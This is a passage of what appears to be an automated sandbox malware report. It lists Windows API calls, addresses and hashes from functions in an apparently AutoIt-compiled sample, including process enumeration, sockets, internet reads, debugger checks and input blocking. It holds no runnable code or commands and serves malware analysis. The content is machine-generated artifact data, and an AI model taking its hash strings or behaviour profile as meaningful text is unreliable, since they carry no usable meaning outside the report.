                                                                                • Opcode ID: 2b39a631159a21a233e7eb93538bc31a07461328268b15f3b3108bb8eb8a42ae
                                                                                • Instruction ID: 9a628cb7afd919ab8d10dee26f4f5a5e0954b3323a4c4334e61743c02babfe57
                                                                                • Opcode Fuzzy Hash: 2b39a631159a21a233e7eb93538bc31a07461328268b15f3b3108bb8eb8a42ae
                                                                                • Instruction Fuzzy Hash: 4741717190420A9FCF15DFA4C859BEEBBB4EF0A314F104166F815A31A1DB709F84DB62
                                                                                APIs
                                                                                • DefDlgProcW.USER32(?,?), ref: 00C3228E
                                                                                • GetSysColor.USER32(0000000F), ref: 00C32363
                                                                                • SetBkColor.GDI32(?,00000000), ref: 00C32376
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Color$Proc
                                                                                • String ID:
                                                                                • API String ID: 929743424-0
                                                                                • Opcode ID: 7d2702c5c5520ebdf674d6db007da58e412455421c736af0d847d098e4ad580b
                                                                                • Instruction ID: 5fd0132d10535ad8794350bf1586f248779f46c52cfc9e536e5ac0d8b0e1c53b
                                                                                • Opcode Fuzzy Hash: 7d2702c5c5520ebdf674d6db007da58e412455421c736af0d847d098e4ad580b
                                                                                • Instruction Fuzzy Hash: 7B8126B0224484BEEA39BA3E8C4CF7F195DDB46300F154119F522C65B2CE2A9F02F676
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00CBAE1E
                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00CBAE2C
                                                                                  • Part of subcall function 00C3C110: _wcslen.LIBCMT ref: 00C3C11A
                                                                                • CompareStringW.KERNEL32(00000400,00000001,?,?,?,?,?), ref: 00CBAEB0
                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00CBAF18
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00CBAF2A
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                • String ID:
                                                                                • API String ID: 1991900642-0
                                                                                • Opcode ID: bf901c5fc99f2ecf9c3fb8f419fc8611fb01c5f364aa55b6aab00b6867347429
                                                                                • Instruction ID: 429829f77cf5f30b43e7dc63785b2853781d04324c6d49d27c772229a8889a59
                                                                                • Opcode Fuzzy Hash: bf901c5fc99f2ecf9c3fb8f419fc8611fb01c5f364aa55b6aab00b6867347429
                                                                                • Instruction Fuzzy Hash: C3613AB1508341AFC710EF24D886AAFBBE8FF89754F00492DF59597291EB70E904DB92
                                                                                APIs
                                                                                  • Part of subcall function 00CB3821: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00CB384D
                                                                                  • Part of subcall function 00CB3821: _wcslen.LIBCMT ref: 00CB386E
                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00CB20A3
                                                                                • WSAGetLastError.WSOCK32 ref: 00CB20CA
                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00CB2121
                                                                                • WSAGetLastError.WSOCK32 ref: 00CB212C
                                                                                • closesocket.WSOCK32(00000000), ref: 00CB215B
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                • String ID:
                                                                                • API String ID: 1601658205-0
                                                                                • Opcode ID: 1c64737282251c452e4fcebf14eadc083703570c95125801e16408f0770c54ec
                                                                                • Instruction ID: 5ef14c5faebd913c9372864e948363ed50144b9aaf0974e31f1db376bd29b5a0
                                                                                • Opcode Fuzzy Hash: 1c64737282251c452e4fcebf14eadc083703570c95125801e16408f0770c54ec
                                                                                • Instruction Fuzzy Hash: 8451C171A00210AFD721AF24D886FAE77A5AB05714F088098F956AF3D3CB71AD41DBE1
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                • String ID:
                                                                                • API String ID: 292994002-0
                                                                                • Opcode ID: ccae822b8ec99301accdd5b359e4f167f61f6986265e95b4f28c459171e4dd0c
                                                                                • Instruction ID: f866fab83243aa3eb50d4e525eed1915627f7a82ef41e2d7c665607d946aa684
                                                                                • Opcode Fuzzy Hash: ccae822b8ec99301accdd5b359e4f167f61f6986265e95b4f28c459171e4dd0c
                                                                                • Instruction Fuzzy Hash: 7C21B5317002809FD7119F26D844F5E7B9DBF85315F1C806CE85A8B261DB79DD42CBA0
                                                                                APIs
                                                                                • InternetReadFile.WININET(?,?,00000400,?), ref: 00CAD6B7
                                                                                • GetLastError.KERNEL32(?,00000000), ref: 00CAD718
                                                                                • SetEvent.KERNEL32(?,?,00000000), ref: 00CAD72C
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorEventFileInternetLastRead
                                                                                • String ID:
                                                                                • API String ID: 234945975-0
                                                                                • Opcode ID: 6241bb0b627fa36d6062393bf847f391d7dee86e8e48a977e766139d049d223f
                                                                                • Instruction ID: d16e9632d09f22fb9d017af39aeee7bb58a90ec05c3461a4ca8750b60bad7a79
                                                                                • Opcode Fuzzy Hash: 6241bb0b627fa36d6062393bf847f391d7dee86e8e48a977e766139d049d223f
                                                                                • Instruction Fuzzy Hash: B921CF75500706AFEB24DF65C888BABB7F8EF41308F10482AE657D2551D770EE45DB60
                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32 ref: 00C62AAA
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C62AB4
                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00C62AC1
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                • String ID:
                                                                                • API String ID: 3906539128-0
                                                                                • Opcode ID: 2b5e25f0f92ff97c3b3675941da10a56c947a81e2417da2986deca57b2c2fa2e
                                                                                • Instruction ID: 1892071ee6d234426590bebf33c37fdfd41994b689ba1300d8140c45f7d2635c
                                                                                • Opcode Fuzzy Hash: 2b5e25f0f92ff97c3b3675941da10a56c947a81e2417da2986deca57b2c2fa2e
                                                                                • Instruction Fuzzy Hash: 2F31D57490121C9BCB21DF64D989B9DBBB8BF08310F5045EAE81CA6261E7709FC59F45
                                                                                APIs
                                                                                • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00C9EBC4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: mouse_event
                                                                                • String ID: DOWN
                                                                                • API String ID: 2434400541-711622031
                                                                                • Opcode ID: 2de210ae326556af63f4c7141445b2da1d8330d0c7beb8f9a1befeeb22a20352
                                                                                • Instruction ID: 1ccc3ccc13e1682c8600ef6b83ca907c8bed1ca0bd659cf3696668ad3402312b
                                                                                • Opcode Fuzzy Hash: 2de210ae326556af63f4c7141445b2da1d8330d0c7beb8f9a1befeeb22a20352
                                                                                • Instruction Fuzzy Hash: A6E0CD6A19D7353DBD4821187C07EF7034C9B32335B210156FC11E50C0ED841DC661AD
                                                                                APIs
                                                                                • GetUserNameW.ADVAPI32(?,?), ref: 00C8E42B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: NameUser
                                                                                • String ID: X64
                                                                                • API String ID: 2645101109-893830106
                                                                                • Opcode ID: c3833a925fc9ebcca633bce63ed609422191d87f7a127e5de59c48a6be388a86
                                                                                • Instruction ID: db11792de87683e932d91198035fdd1fde8be64bfeb320de676f97b794e9312b
                                                                                • Opcode Fuzzy Hash: c3833a925fc9ebcca633bce63ed609422191d87f7a127e5de59c48a6be388a86
                                                                                • Instruction Fuzzy Hash: 25D0C9B480111DEACB90CB91DC88EDE777CBB04308F104555F506E2000D77095498B10
                                                                                APIs
                                                                                • BlockInput.USER32(00000001), ref: 00CAF303
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: BlockInput
                                                                                • String ID:
                                                                                • API String ID: 3456056419-0
                                                                                • Opcode ID: b169a1a2ce1a3d47975bdcd037a4e84b8faa7b2ab7c3772ec11afcb0d6e64737
                                                                                • Instruction ID: 7f653aa9d4ea6b6e673d70c5a481b9084bfde65c33b54d704777f481d0ff18b9
                                                                                • Opcode Fuzzy Hash: b169a1a2ce1a3d47975bdcd037a4e84b8faa7b2ab7c3772ec11afcb0d6e64737
                                                                                • Instruction Fuzzy Hash: 3DE0D8322102015FCB10AF5AD440E8AF7D8AF55360F00802AF84AC7310CA70E941CB90
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00020E01,00C5080E), ref: 00C50DFA
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: 350dc5961194657ecb5dd3b59b3641bc6d6d7c82b0b942bcc2b5a98d13a8448d
                                                                                • Instruction ID: f4f6d46614fe38102095e71030670cb7c0e6a83a5b75aaea14f492071e8c09f7
                                                                                • Opcode Fuzzy Hash: 350dc5961194657ecb5dd3b59b3641bc6d6d7c82b0b942bcc2b5a98d13a8448d
                                                                                • Instruction Fuzzy Hash:
                                                                                APIs
                                                                                • DeleteObject.GDI32(00000000), ref: 00CB3303
                                                                                • DeleteObject.GDI32(00000000), ref: 00CB3316
                                                                                • DestroyWindow.USER32 ref: 00CB3325
                                                                                • GetDesktopWindow.USER32 ref: 00CB3340
                                                                                • GetWindowRect.USER32(00000000), ref: 00CB3347
                                                                                • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00CB3476
                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00CB3484
                                                                                • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB34CB
                                                                                • GetClientRect.USER32(00000000,?), ref: 00CB34D7
                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00CB3513
                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB3535
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB3548
                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB3553
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00CB355C
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB356B
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00CB3574
                                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB357B
                                                                                • GlobalFree.KERNEL32(00000000), ref: 00CB3586
                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB3598
                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00CD0BFC,00000000), ref: 00CB35AE
                                                                                • GlobalFree.KERNEL32(00000000), ref: 00CB35BE
                                                                                • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00CB35E4
                                                                                • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00CB3603
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB3625
                                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CB3812
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                • API String ID: 2211948467-2373415609
                                                                                • Opcode ID: 68664e9853954f2b367dc5da8d706a155ffbc48aa5f1641f5c321bc3739f0be2
                                                                                • Instruction ID: 35f12efdf5c3cd8cba262b1d322562073fc59c9f4bd429a602b312138f00474c
                                                                                • Opcode Fuzzy Hash: 68664e9853954f2b367dc5da8d706a155ffbc48aa5f1641f5c321bc3739f0be2
                                                                                • Instruction Fuzzy Hash: AB025D71900215AFDB14DF64CD89FAE7BB9FB49710F048569F916AB2A0CB74EE01CB60
                                                                                APIs
                                                                                • SetTextColor.GDI32(?,00000000), ref: 00CC7716
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00CC7747
                                                                                • GetSysColor.USER32(0000000F), ref: 00CC7753
                                                                                • SetBkColor.GDI32(?,000000FF), ref: 00CC776D
                                                                                • SelectObject.GDI32(?,?), ref: 00CC777C
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00CC77A7
                                                                                • GetSysColor.USER32(00000010), ref: 00CC77AF
                                                                                • CreateSolidBrush.GDI32(00000000), ref: 00CC77B6
                                                                                • FrameRect.USER32(?,?,00000000), ref: 00CC77C5
                                                                                • DeleteObject.GDI32(00000000), ref: 00CC77CC
                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 00CC7817
                                                                                • FillRect.USER32(?,?,?), ref: 00CC7849
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00CC786B
                                                                                  • Part of subcall function 00CC79CF: GetSysColor.USER32(00000012), ref: 00CC7A08
                                                                                  • Part of subcall function 00CC79CF: SetTextColor.GDI32(?,00CC76DC), ref: 00CC7A0C
                                                                                  • Part of subcall function 00CC79CF: GetSysColorBrush.USER32(0000000F), ref: 00CC7A22
                                                                                  • Part of subcall function 00CC79CF: GetSysColor.USER32(0000000F), ref: 00CC7A2D
                                                                                  • Part of subcall function 00CC79CF: GetSysColor.USER32(00000011), ref: 00CC7A4A
                                                                                  • Part of subcall function 00CC79CF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CC7A58
                                                                                  • Part of subcall function 00CC79CF: SelectObject.GDI32(?,00000000), ref: 00CC7A69
                                                                                  • Part of subcall function 00CC79CF: SetBkColor.GDI32(?,?), ref: 00CC7A72
                                                                                  • Part of subcall function 00CC79CF: SelectObject.GDI32(?,?), ref: 00CC7A7F
                                                                                  • Part of subcall function 00CC79CF: InflateRect.USER32(?,000000FF,000000FF), ref: 00CC7A9E
                                                                                  • Part of subcall function 00CC79CF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CC7AB5
                                                                                  • Part of subcall function 00CC79CF: GetWindowLongW.USER32(?,000000F0), ref: 00CC7AC2
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                • String ID:
                                                                                • API String ID: 4124339563-0
                                                                                • Opcode ID: f51eab20abbf5bffed6cf06b6921cb9503745f50758c2a5ceaea612c514bf434
                                                                                • Instruction ID: 14d1ef52c60189ac19875f7509c4a59c67abfefa6feddd0d00e4759bba2c00f7
                                                                                • Opcode Fuzzy Hash: f51eab20abbf5bffed6cf06b6921cb9503745f50758c2a5ceaea612c514bf434
                                                                                • Instruction Fuzzy Hash: A6A14B72008305AFDB119F64DC48F6EBBA9FB49325F140A29FAA3A61E0D771D944CF51
                                                                                APIs
                                                                                • DestroyWindow.USER32(?,?), ref: 00C36828
                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 00C75013
                                                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C7504C
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C75491
                                                                                  • Part of subcall function 00C3670F: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C316CD,?,00000000,?,?,?,?,00C3169F,00000000,?), ref: 00C36772
                                                                                • SendMessageW.USER32(?,00001053), ref: 00C754CD
                                                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C754E4
                                                                                • ImageList_Destroy.COMCTL32(00000000,?), ref: 00C754FA
                                                                                • ImageList_Destroy.COMCTL32(00000000,?), ref: 00C75505
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                • String ID: 0
                                                                                • API String ID: 2760611726-4108050209
                                                                                • Opcode ID: 5a498243df0e1b88a4e72386262793be0a5fa250ac5b1bb4f77365e15032c30f
                                                                                • Instruction ID: 03dd06a359cb84bc4e1ad2fb8becb6930b2a71f6e279506bafd8b44429218887
                                                                                • Opcode Fuzzy Hash: 5a498243df0e1b88a4e72386262793be0a5fa250ac5b1bb4f77365e15032c30f
                                                                                • Instruction Fuzzy Hash: DC12BF30601A01AFC725CF14D848B69BBE1FB48311F54C469F4A9CB2A2C7B1ED92DF91
                                                                                APIs
                                                                                • DestroyWindow.USER32(00000000), ref: 00CB2F80
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00CB304B
                                                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00CB3089
                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00CB3099
                                                                                • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00CB30DF
                                                                                • GetClientRect.USER32(00000000,?), ref: 00CB30EB
                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00CB3132
                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00CB3141
                                                                                • GetStockObject.GDI32(00000011), ref: 00CB3151
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00CB3155
                                                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00CB3165
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CB316E
                                                                                • DeleteDC.GDI32(00000000), ref: 00CB3177
                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00CB31A3
                                                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 00CB31BA
                                                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00CB31F5
                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00CB3209
                                                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 00CB321A
                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00CB324A
                                                                                • GetStockObject.GDI32(00000011), ref: 00CB3255
                                                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00CB3260
